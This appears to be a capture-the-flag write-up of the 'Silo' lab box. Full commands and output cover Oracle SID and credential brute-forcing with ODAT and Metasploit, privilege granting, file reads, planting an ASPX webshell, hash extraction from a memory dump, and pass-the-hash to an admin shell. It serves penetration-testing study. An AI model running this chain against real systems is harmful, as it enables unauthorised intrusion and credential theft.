From the initial scan Oracle is the obvious target on this box. Once the little installations worries passed for Odat tools on Kali, it is straigh forward, as this tool is really helpful for this kind of box who looks like a system & DB install & configured by a sysadmin (or DBA) really in a hurry.

There is probably another path to not grab directly the Administrator flag, but haven't found it.
So once connected, I found a memory dump on the Phineas local user, and proceed to the classic privilege escalation too, exploiting a memory dump.

Enumeration

Nmap

Begin a global nmap scan with options:

  • -sC: Services detection
  • -sV: Version detection
  • -oA: output file on all formats (normal + xml + grepable)
  • -p-: port 1 to 65535
root@kali-oscp:~# nmap -sC -sV -oA nmap-silo 10.10.10.82 -p-
        Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-13 15:10 WAT
        Nmap scan report for 10.10.10.82
        Host is up (0.10s latency).
        Not shown: 65520 closed ports
        PORT      STATE SERVICE      VERSION
        80/tcp    open  http         Microsoft IIS httpd 8.5
        | http-methods: 
        |_  Potentially risky methods: TRACE
        |_http-server-header: Microsoft-IIS/8.5
        |_http-title: IIS Windows Server
        135/tcp   open  msrpc        Microsoft Windows RPC
        139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
        445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
        1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
        5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
        |_http-server-header: Microsoft-HTTPAPI/2.0
        |_http-title: Not Found
        47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
        |_http-server-header: Microsoft-HTTPAPI/2.0
        |_http-title: Not Found
        49152/tcp open  msrpc        Microsoft Windows RPC
        49153/tcp open  msrpc        Microsoft Windows RPC
        49154/tcp open  msrpc        Microsoft Windows RPC
        49155/tcp open  msrpc        Microsoft Windows RPC
        49158/tcp open  msrpc        Microsoft Windows RPC
        49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
        49161/tcp open  msrpc        Microsoft Windows RPC
        49162/tcp open  msrpc        Microsoft Windows RPC  
        Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

So we have:
- a web server IIS 8.5
- SMB shares 139 & 445
- an Oracle Listener 11.2.0.2.0
- Remote PowerShell 5985

WEB ENUM

Default IIS Windows server web page -> http://10.10.10.82/ -> Nothing interesting here

ORACLE ENUMERATION

PRE-REQUISITES FOR ODAT

What is odat ?

According to the Github description, ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely.
It can be used to find SID, credentials, escalate privileges, get reverse shell, ...

Install Oracle Client

Create a free account on oracle.com, then follow this link (https://www.oracle.com/technetwork/topics/linuxsoft-082809.html) and download the 3 needed packages basic-linux, sqlplus & sdk(devel):
- oracle-instantclient18.3-basic-18.3.0.0.0-1.i386.rpm
- oracle-instantclient18.3-sqlplus-18.3.0.0.0-1.i386.rpm
- oracle-instantclient18.3-devel-18.3.0.0.0-1.i386.rpm

Convert rpm package with alien to make them Debian "compliant".

root@kali-oscp:~ # apt install -y libaio1 python-dev alien python-pip
root@kali-oscp:~/download# ls                                                                      
        oracle-instantclient18.3-basic-18.3.0.0.0-1.i386.rpm  oracle-instantclient18.3-sqlplus-18.3.0.0.0-1.i386.rpm
        oracle-instantclient18.3-devel-18.3.0.0.0-1.i386.rpm     

root@kali-oscp:~/download# alien --to-deb *.rpm
        oracle-instantclient18.3-basic_18.3.0.0.0-2_i386.deb generated
        oracle-instantclient18.3-devel_18.3.0.0.0-2_i386.deb generated
        oracle-instantclient18.3-sqlplus_18.3.0.0.0-2_i386.deb generated

root@kali-oscp:~/download# dpkg -i *.deb



Edit /etc/profile, and add the following. Change the Oracle 18.3 version number by the one you used.

export ORACLE_HOME=/usr/lib/oracle/18.3/client/
export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:$ORACLE_HOME/lib
export PATH=$ORACLE_HOME/bin:$PATH

Reload the environment or close the session
source ~/.bashrc

Install Odat

Now we can finally start working on the box. Begin by cloning the Git repository of ODat tool.

root@kali-oscp:~/tools/oracle# git clone https://github.com/quentinhardy/odat.git
    Cloning into 'odat'...
    remote: Enumerating objects: 716, done.
    remote: Total 716 (delta 0), reused 0 (delta 0), pack-reused 716
    Receiving objects: 100% (716/716), 807.47 KiB | 1.63 MiB/s, done.
    Resolving deltas: 100% (432/432), done.



Others Odat dependencies

root@kali-oscp:~/tools/oracle/odat# python odat.py -h
    Traceback (most recent call last):
      File "odat.py", line 17, in <module>
        import argparse, logging, platform, cx_Oracle, string, os, sys
    ImportError: No module named cx_Oracle

root@kali-oscp:~/tools/oracle/odat# python -m pip install cx_Oracle --upgrade
    Collecting cx_Oracle
      Downloading https://files.pythonhosted.org/packages/b7/70/03dbb0f055ee97f7ddb6c6f11668f23a97b5884fdf4826a006ef91c5085c/cx_Oracle-7.0.0.tar.gz (281kB)
        100% |████████████████████████████████| 286kB 2.4MB/s 
    Building wheels for collected packages: cx-Oracle
      Running setup.py bdist_wheel for cx-Oracle ... done
      Stored in directory: /root/.cache/pip/wheels/31/db/58/a89e912df33e3545643a49cd8bcfe0f513d101b9d115cbeae4
    Successfully built cx-Oracle
    Installing collected packages: cx-Oracle
    Successfully installed cx-Oracle-7.0.0


ENUMERATE ORACLE SID'S

Method n°1 (odat)

Use the sidguesser option of odat, that will bruteforce SID with 1 & 2 characters + try defaults ones.

root@kali-oscp:~/tools/oracle/odat# ./odat.py sidguesser -s 10.10.10.82
    [1] (10.10.10.82:1521): Searching valid SIDs
    [1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
    [+] 'XE' is a valid SID. Continue...                                                                                                                                 
    [+] 'XEXDB' is a valid SID. Continue...                                                                                                                              
    100% |##############################################################################################################################################| Time: 00:00:31 
    [1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
    100% |##############################################################################################################################################| Time: 00:00:01 
    [1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
    [+] 'XE' is a valid SID. Continue...                                                                                                                                 
    100% |##############################################################################################################################################| Time: 00:00:28 
    [+] SIDs found on the 10.10.10.82:1521 server: XE,XEXDB



Method n°2 (metasploit)

The auxiliary/admin/oracle/sidbrute metasploit module will only try SID based on a list, but in our case it will be enough.

root@kali-oscp:~# msfconsole
msf> use auxiliary/admin/oracle/sid_brute
msf auxiliary(admin/oracle/sid_brute) > set RHOST 10.10.10.82
msf auxiliary(admin/oracle/sid_brute) > run
        [*] 10.10.10.82:1521 - Starting brute force on 10.10.10.82, using sids from /usr/share/metasploit-framework/data/wordlists/sid.txt...
        [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'XE'
        [+] 10.10.10.82:1521 - 10.10.10.82:1521 Found SID 'PLSExtProc'


ENUMERATE SCHEMAS (USERNAMES)

Begin by duplicate with minus characters all the entries in the default file used by odat accounts/accounts.txt, because as we are in a version higher than the 9, Oracle login is now case sensitive.
root@kali-oscp:~/tools/oracle/odat# tr '[:upper:]' '[:lower:]' <accounts/accounts.txt > accounts/accounts-small.txt

Use the passwordguesser option of odat to find if there is any valider default credentials configured
root@kali-oscp:~/tools/oracle/odat# ./odat.py passwordguesser -s 10.10.10.82 -d XE --accounts-file accounts/accounts-small.txt

Verify these credentials by connecting manually on the database

root@kali-oscp:~# sqlplus scott/tiger@10.10.10.82:1521/XE
    SQL*Plus: Release 18.0.0.0.0 - Production on Tue May 13 11:22:07 2018
    Version 18.3.0.0.0
    Copyright (c) 1982, 2018, Oracle.  All rights reserved.
    ERROR:
    ORA-28002: the password will expire within 7 days

    Connected to:
    Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
    SQL>


EXPLOITING ORACLE

PRIVILEGES GRANTING

Grant permissions to scott user, as apparently he have permissions to connect as sysdba on the DB ... (thank you lazy sysadmin & nice boxe creator)

root@kali-oscp:~# sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba
SQL*Plus: Release 18.0.0.0.0 - Production on Wed Oct 31 03:32:39 2018
Version 18.3.0.0.0
Copyright (c) 1982, 2018, Oracle.  All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL> grant all privileges to scott identified by tiger;
Grant succeeded.


ODAT VULNERABILITY SCAN

Execute odat “all” option and check which module we can use.

root@kali-oscp:~/tools/oracle/odat# ./odat.py all -s 10.10.10.82 -d XE -U scott -P tiger
[1] (10.10.10.82:1521): Is it vulnerable to TNS poisoning (CVE-2012-1675)?                                                                                              
[+] The target is vulnerable to a remote TNS poisoning                                                                                                                  
[2] (10.10.10.82:1521): Testing all modules on the XE SID with the scott/tiger account                                                                                  
...
[2.3] UTL_FILE library ?
[+] OK
...
[2.5] DBMSADVISOR library ?
[+] OK
...
[2.10] DBMS_XSLPROCESSOR library ?
[+] OK
...
[2.14] DBMS_LOB to read files ?
[+] OK
...
[2.16] Gain elevated access (privilege escalation)?
[2.16.1] DBA role using CREATE/EXECUTE ANY PROCEDURE privileges?
[+] OK
...
[2.16.3] DBA role using CREATE ANY TRIGGER privilege?
[+] OK
[2.16.4] DBA role using ANALYZE ANY (and CREATE PROCEDURE) privileges?
[+] OK
...


UTL_FILE

Will be the library to go. So, as the Oracle process is running as Administrator, we will grab the root.txt file ...

root@kali-oscp:~/tools/oracle/odat# ./odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --getFile "C:\Users\Administrator\Desktop" root.txt root.txt

[1] (10.10.10.82:1521): Read the root.txt file stored in C:\Users\Administrator\Desktop on the 10.10.10.82 server
[+] Data stored in the root.txt file sored in C:\Users\Administrator\Desktop (copied in root.txt locally):
cd39ea0af65********************

Hmmm, OK. Now I need the user.txt, but I didn't have any username ...

As everything seems to be installed by default on this server, it seems a good idea to try to put a reverse aspx shell on the default IIS working directory.
./odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot\' 'nvko.aspx' /usr/share/webshells/aspx/cmdasp.aspx --sysdba

And go to http://10.10.10.82/nvko.aspx, to gain a RCE directly from the browser, and simply grab user.txt

BONUS GIFT

DROPBOX FILE

There is another interesting file on the Desktop of Phineas user. "Oracle issue.txt"

Follow the link and download the file.

Extract the two concatenated zip files.

root@kali-oscp:~/download/# unzip 'MEMORY\ DUMP.zip
root@kali-oscp:~/download/# unzip SILO-20180105-221806.zip

Now we have a memory dump file of around 1GB. Volatility will be the goto tools as this framework can quickly extract valuable informations.

EXTRACTING DATA WITH VOLATILITY

root@kali-oscp:~/tools# git clone https://github.com/volatilityfoundation/volatility.git
root@kali-oscp:~/tools# cd volatility
root@kali-oscp:~/tools/volatility# python vol.py imageinfo -f ~/download/SILO-20180105-221806.dmp 
    Volatility Foundation Volatility Framework 2.6
    INFO    : volatility.debug    : Determining profile based on KDBG search...
    WARNING : volatility.debug    : Alignment of WindowsCrashDumpSpace64 is too small, plugins will be extremely slow
    ...
              Suggested Profile(s) : Win8SP0x64, Win10x64_17134, Win81U1x64, Win10x64_10240_17770, Win10x64_14393, Win2012R2x64_18340, Win10x64, Win2016x64_14393, Win10x64_16299, Win2012R2x64, Win2012x64, Win8SP1x64_18340, Win10x64_10586, Win8SP1x64, Win10x64_15063 (Instantiated with Win10x64_15063)
                         AS Layer1 : SkipDuplicatesAMD64PagedMemory (Kernel AS)
                         AS Layer2 : WindowsCrashDumpSpace64 (Unnamed AS)
                         AS Layer3 : FileAddressSpace (/root/download/SILO-20180105-221806.dmp)
                          PAE type : No PAE
                               DTB : 0x1a7000L
                              KDBG : 0xf80078520a30L
              Number of Processors : 2
         Image Type (Service Pack) : 0
                    KPCR for CPU 0 : 0xfffff8007857b000L
                    KPCR for CPU 1 : 0xffffd000207e8000L
                 KUSER_SHARED_DATA : 0xfffff78000000000L
               Image date and time : 2018-01-05 22:18:07 UTC+0000
         Image local date and time : 2018-01-05 22:18:07 +0000



Volatility suggests me several profiles. Therefore, we are already Administrator on the host, so I check the windows version number from the aspx remote command with "ver". And it returns me 6.3.9600 as version number.

Asking to google 6.3.9600 correspond to Windows 8.1 Update 1 or Windows Server 2012 R2. So select this profile from the list, and ask to volatility to locate virtual addresses of registry hives in the dump.

Perfect, we have SYSTEM & SAM files, so we can certainly dump hashes of Administrator and use the PassTheHash technique to have a remote shell. But before that, and as I am not yet very familiar with volatility I have tested a wiiiiiiiiide range of his numerous options, and here are the interesting ones:



1- Extract commands history

(show the program used by the machine maker to create the dump)

root@kali-oscp:~/tools/volatility# python vol.py -f ~/download/SILO-20180105-221806.dmp --profile=Win2012R2x64 consoles
    ...
    Console: 0x7ff6fa136260 CommandHistorySize: 50
    HistoryBufferCount: 1 HistoryBufferMax: 4
    OriginalTitle: C:\Users\Administrator\Desktop\DumpIt.exe
    Title: C:\Users\Administrator\Desktop\DumpIt.exe



2- Hashdump

root@kali-oscp:~/tools/volatility# python vol.py -f ~/download/SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump
    Volatility Foundation Volatility Framework 2.6
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::



3- Processes list

root@kali-oscp:~/tools/volatility# python vol.py -f ~/download/SILO-20180105-221806.dmp --profile=Win2012R2x64 pslist
    0xffffe00004f84940 oracle.exe             1088    492     30        0      0      0 2018-01-05 22:17:17 UTC+0000                                                         
    0xffffe00004fe93c0 OraClrAgnt.exe         1192    492      2        0      0      0 2018-01-05 22:17:18 UTC+0000                                                         
    0xffffe00004fef940 TNSLSNR.EXE            1208    492      5        0      0      0 2018-01-05 22:17:18 UTC+0000                                       
    0xffffe00003203340 DumpIt.exe             2932   2424      4        0      1      0 2018-01-05 22:18:06 UTC+0000 


PASS THE HASH

On the nmap scan we have discovered that there is a SMB share, so we will use the kali provided binary to get a shell (pth-winexe). Just as reminder, do not use IP address it will not work, but instead fill your /etc/hosts file (10.10.10.82 silo.htb per ex).

root@kali-oscp:~# pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 //silo.htb cmd.exe
    E_md4hash wrapper called.
    HASH PASS: Substituting user supplied NTLM HASH...
    Microsoft Windows [Version 6.3.9600]
    (c) 2013 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>ver
    Microsoft Windows [Version 6.3.9600]

    C:\Windows\system32>whoami
    silo\administrator